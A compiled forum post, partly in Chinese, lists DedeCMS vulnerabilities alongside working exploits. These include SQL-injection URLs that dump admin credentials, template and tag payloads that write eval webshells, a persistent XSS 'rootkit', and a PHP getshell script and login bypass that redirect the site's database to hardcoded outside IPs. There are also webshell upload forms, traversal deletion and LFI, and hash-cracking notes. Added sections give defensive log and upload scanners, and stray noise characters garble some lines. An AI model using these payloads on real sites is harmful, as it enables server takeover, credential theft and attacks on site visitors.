DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
updatexml() is handed the string [uname:MID(pwd,4,16)] built from dede_admin (0x5b, 0x3a and 0x5d are '[', ':' and ']'), so the admin user name and the 16-character part of the password hash come back inside the XML error message.
DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a "software" entry; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line shell with password xiao (the two base64 strings decode to x.php and <?php eval($_POST[xiao])?>baidu).
DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__ is #@__, the table-prefix placeholder that DedeCMS expands to the configured prefix, so the query reads the admin table.)

/ F$ D0 e" O. y* i
! N, \7 |4 D- i- J6 V9 L6 ~4 [7 c# v. B5 z

: ]3 [; {  G. T# y$ m2 B/ ~6 j9 Y4 o: c  n+ r

( H" b9 k- i- J0 D0 |+ u! YDEDECMS 全版本 gotopage变量XSS漏洞% N& U  b9 ~' v! N& I
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 8 V8 [7 v3 m! ?2 f$ t5 P) C
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="4 ~4 k" ?# o, q/ m8 d5 m
4 o& O7 V) u+ R$ I5 i# v1 e0 l: Q

/ |; W2 c# S% p2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
0 l3 I0 ~+ M) Z, E7 c4 k5 y' @  y
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
+ K( y0 L" h5 M; q1 T  R! y4 g4 Q/ [) T" @5 T! @
3 ~( @! Y. w% v! ^
http://v57.demo.dedecms.com/dede/login.php% U1 T4 m9 _/ w$ y% g

7 y& y+ L' F( ^) i! T* J
DedeCMS variable override getshell
#!/usr/bin/php
<?php
// DedeCMS variable override getshell via plus/mytag_js.php.
// The _COOKIE[GLOBALS][cfg_db*] fields override the database settings, so
// mytag_js.php fetches the dede_mytag row from a MySQL server the attacker
// controls; that row's {dede:php} body writes the shell (see the SQL insert in
// the "tag remote file write" section below for the row to prepare).
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath= /   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=isset($argv[3]) ? $argv[3] : '';
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line; in "HTTP/1.1 200 OK" the
// "OK" sits at offset 13, so this is effectively a check for a 200 status.
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// cfg_dbhost/cfg_dbuser/cfg_dbpwd/cfg_dbname point at the attacker's MySQL
// server exactly as published in the original post.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return "";
}
fwrite($ock,$data);
$exp=fgets($ock, 1024);   // status line is all the caller looks at
fclose($ock);
return $exp;
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/<backend-dir>/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Replace validate=dcug with the captcha currently shown and you are logged straight into the site backend. The _POST[GLOBALS][cfg_db*] parameters replace the database settings with a server of the attacker's choosing, the same override used in the variable override getshell above.

Prerequisite: this only works once you know the backend path.

DedeCMS tag remote file write vulnerability
Prerequisite: set up your own DedeCMS database first and insert this row:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(As posted, the string passed to fwrite is empty; the shell body belongs between those two quotes.)

Then submit with the form below and the shell appears as 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// point the form at the URL typed into the doaction field before it is submitted
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

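Added example, not from the post: detection logic for the request shape that the variable override getshell, the login.php bypass and the mytag_js.php form above all share, namely client-supplied parameters named `_COOKIE[GLOBALS][...]`, `_POST[GLOBALS][...]`, `GLOBALS[...]` or bare `cfg_*`. The Apache-style log lines, addresses and timestamps are constructed for illustration. One limitation worth knowing: the PHP script and the form send the override in the POST body, which an access log does not record, so for those the same test has to run in a WAF or at the PHP entry point.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Oct/2012:10:42:15 +0800] "POST /plus/mytag_js.php?aid=1 HTTP/1.1" 200 88 "-" "Mozilla/5.0"
203.0.113.9 - - [18/Oct/2012:10:43:01 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.200&_POST%5BGLOBALS%5D%5Bcfg_dbuser%5D=root HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Oct/2012:10:44:30 +0800] "GET /plus/list.php?tid=1&GLOBALS[cfg_dbprefix]=x HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.8 - - [18/Oct/2012:10:45:00 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names a client should never be sending: writes into PHP
# superglobals or the GLOBALS array, or direct cfg_* configuration values.
SUPERGLOBAL_KEY = re.compile(r"^(?:_COOKIE|_POST|_GET|_REQUEST|_SERVER|_SESSION|GLOBALS)\s*\[", re.I)
CFG_KEY = re.compile(r"^cfg_", re.I)


def suspicious_params(target: str) -> list:
    """Query-string parameter names in `target` that look like variable overrides."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so _POST%5BGLOBALS%5D... becomes _POST[GLOBALS]...
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if SUPERGLOBAL_KEY.match(name) or CFG_KEY.match(name)]


def find_globals_override(log_text: str) -> list:
    """One finding per request whose query string carries override parameters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        names = suspicious_params(m["target"])
        if names:
            findings.append({
                "ip": m["ip"],
                "ts": m["ts"],
                "path": urlsplit(m["target"]).path,
                "status": int(m["status"]),
                "params": names,
            })
    return findings


if __name__ == "__main__":
    for f in find_globals_override(SAMPLE_LOG):
        print(f["ip"], f["path"], f["status"], f["params"])
```

The name test is deliberately on the decoded parameter name rather than on a substring like `cfg_dbhost`, so that `GLOBALS[anything]` and `_COOKIE[anything]` are caught even when the target setting is not one of the database ones.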
DedeCMS <= V5.6 Final template execution vulnerability

1. Register a user, log in to the member area, publish an article and upload an image. Then, in attachment management, replace the image with our crafted template. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend GIF89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source, and build a form like the one below (the templet and dede_addonfields fields are the crafted part):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">Content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value='<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>' style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, the template path has been changed.

3. Visit the edited article. Assuming its aid is 2, just request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is created in the plus directory.

DedeCMS website management system GetShell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">Change</button>
</form>

Build the form above; after the upload the image is stored as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

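Added example, not from the post: a content scanner for the upload-side signatures the embedded code execution, template execution and GetShell sections above rely on. Whatever the file extension says, a member-uploaded "image" or attachment that contains `{dede:php}`, a `{dede:...}` tag with `runphp='yes'`, a closing tag immediately followed by a new opening tag, or a PHP open tag deserves a look. The sample inputs are constructed here (the payload strings are copied from this page; the clean GIF is a minimal 1x1 image) and the signature set is this example's own heuristic.

```python
import re

# Constructed samples: a genuine 1x1 GIF and the payloads quoted on this page.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
GIF_PAYLOAD = b"Gif89a{dede:field name='toby57' runphp='yes'}\nphpinfo();\n{/dede:field}"
LINK_FIELD = b"a{/dede:link}{dede:toby57 name\\=\"']=0;phpinfo();//\"}x{/dede:toby57}"
TEMPLATE_FIELD = b"{dede:name runphp='yes'}\n$fp = @fopen(\"1.php\", 'a');\n{/dede:name}"

# Heuristic signatures; order determines the order of names in the result.
SIGNATURES = {
    # {dede:php} blocks execute their body when the template is rendered
    "dede_php_tag": re.compile(rb"\{dede:php\}", re.I),
    # any tag whose attributes switch on runphp
    "runphp_yes": re.compile(rb"\{dede:\w+[^}]*runphp\s*=\s*['\"]?yes", re.I),
    # a close tag directly followed by an open tag inside one field value:
    # the shape of the {/dede:link}{dede:toby57 ...} injection above
    "tag_injection": re.compile(rb"\{/dede:\w+\}\s*\{dede:\w+", re.I),
    # raw PHP in something that is supposed to be an image or text
    "php_open_tag": re.compile(rb"<\?(?:php\b|=)", re.I),
}


def find_dede_signatures(data: bytes) -> list:
    """Names of the signatures that match anywhere in `data` (empty list if clean)."""
    return [name for name, rx in SIGNATURES.items() if rx.search(data)]


def is_suspicious_upload(data: bytes) -> bool:
    """True when an uploaded blob carries template/PHP markers it should not."""
    return bool(find_dede_signatures(data))


def scan_files(paths) -> dict:
    """Map each path to its matching signature names; skips unreadable files."""
    report = {}
    for p in paths:
        try:
            with open(p, "rb") as fh:
                hits = find_dede_signatures(fh.read())
        except OSError:
            continue
        if hits:
            report[p] = hits
    return report


if __name__ == "__main__":
    for label, blob in [("clean gif", CLEAN_GIF), ("gif payload", GIF_PAYLOAD),
                        ("link field", LINK_FIELD), ("template", TEMPLATE_FIELD)]:
        print(label, find_dede_signatures(blob))
```

The scan is byte-based on purpose: the GetShell payload starts with a valid-looking `Gif89a` header, so an image-type check passes it, and only the body reveals the template tags. Point `scan_files` at the uploads directory on a suspected host to get a per-file list of matches.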
DedeCMS V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The ../ segments in oldface walk out of the member's upload directory, so files outside it get deleted.

DedeCMS V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../
(The URL is truncated in the original post; the code parameter carries the traversal.)

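Added example, not from the post and not DedeCMS's own code: the weak check that a traversal payload like the oldface value above walks past, next to the check that stops it, plus the allow-list test that belongs on an include-selecting parameter such as carbuyaction.php's code. The web-root layout is an assumption.

```python
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"        # assumed layout for the example
UPLOAD_ROOT = "uploads/userup"    # the only tree edit_face.php should ever delete from


def naive_is_allowed(oldface: str) -> bool:
    """Illustrative weak check: a prefix test, which '..' segments walk straight past."""
    return oldface.startswith("/" + UPLOAD_ROOT + "/")


def resolved_is_allowed(oldface: str, web_root: str = WEB_ROOT) -> bool:
    """Hardened check: decode, collapse '.' and '..', then require the result
    to stay inside the upload root.  posixpath is used so the behaviour is the
    same on every platform; in PHP the equivalent is comparing realpath()."""
    rel = unquote(oldface).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(web_root, rel))
    root = posixpath.normpath(posixpath.join(web_root, UPLOAD_ROOT))
    return candidate.startswith(root + "/")


SAFE_NAME = re.compile(r"^[A-Za-z0-9_]+$")


def is_safe_include_name(code: str) -> bool:
    """For include-style parameters: accept a bare identifier only, so no
    separators, dots or encoded variants ever reach the include call."""
    return bool(SAFE_NAME.match(unquote(code)))


if __name__ == "__main__":
    payload = "/uploads/userup/8/../../../member/templets/images/m_logo.gif"
    print("naive:", naive_is_allowed(payload), "resolved:", resolved_is_allowed(payload))
    print("code=../../ accepted:", is_safe_include_name("../../"))
```

The resolved check rejects the PoC path because it normalises to /var/www/html/member/templets/images/m_logo.gif, outside the upload tree; a plain avatar path under uploads/userup still passes.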
On the admin password returned by the plus/advancedsearch.php query above: the stored value is the 32-character MD5 with the first 5 and the last 7 characters removed, a 20-character hash. Cut 3 more characters from the front and 1 from the end of that and you have the standard 16-character MD5.

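Added example, not from the post: the hash arithmetic just described, written out so the three forms can be checked against each other, and an offline candidate test for a dumped 20-character hash. The same slicing explains the MID(pwd,4,16) in the rss.php payload near the top of the page: MySQL's MID is 1-indexed, so it returns characters 4 to 19 of the 20-character value, which is exactly the 16-character MD5. The password "admin" is used only as a sample input.

```python
import hashlib


def full_md5(password: str) -> str:
    """Plain 32-character hex MD5 of the password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def dede_hash20(password: str) -> str:
    """The 20-character form described above: drop 5 from the front, 7 from the end."""
    return full_md5(password)[5:25]


def hash20_to_md5_16(hash20: str) -> str:
    """Apply the post's rule to a dumped value: cut 3 from the front and 1 from the end."""
    if len(hash20) != 20:
        raise ValueError("expected a 20-character DedeCMS hash")
    return hash20[3:19]


def mid_pwd_4_16(hash20: str) -> str:
    """What the rss.php payload's MID(pwd,4,16) yields (MID is 1-indexed)."""
    start = 4 - 1
    return hash20[start:start + 16]


def md5_16(password: str) -> str:
    """The standard 16-character MD5: the middle 16 characters of the digest."""
    return full_md5(password)[8:24]


def check_candidate(hash20: str, candidate: str) -> bool:
    """Offline test of one candidate password against a dumped 20-character hash."""
    return dede_hash20(candidate) == hash20


if __name__ == "__main__":
    h = dede_hash20("admin")
    print(h, hash20_to_md5_16(h), md5_16("admin"), check_candidate(h, "admin"))
```

Because every form is a slice of the same digest, any MD5 wordlist attack runs against the 16-character value without special handling; the 20-character value is just that value with two extra hex characters on each side.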

DedeCMS 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t ---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It combines a MySQL error raised by a numeric overflow in a field value with the fact that DedeCMS logs database errors into a PHP file whose header has no guard.
1. Visit (URL truncated in the original post):
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
You can see the error message.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following proves the injection worked (the int(3) is the output of var_dump(3), so the injected PHP ran):
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar (an attachment to the original post, not reproduced here); note that the form's action points at the trace file:
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the output from step 2 means the trojan file was uploaded successfully.

DedeCMS plus/infosearch.php injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
(The %cf in front of the quote is the wide-byte trick: under GBK the escaping backslash is absorbed into a double-byte character, leaving the quote live.)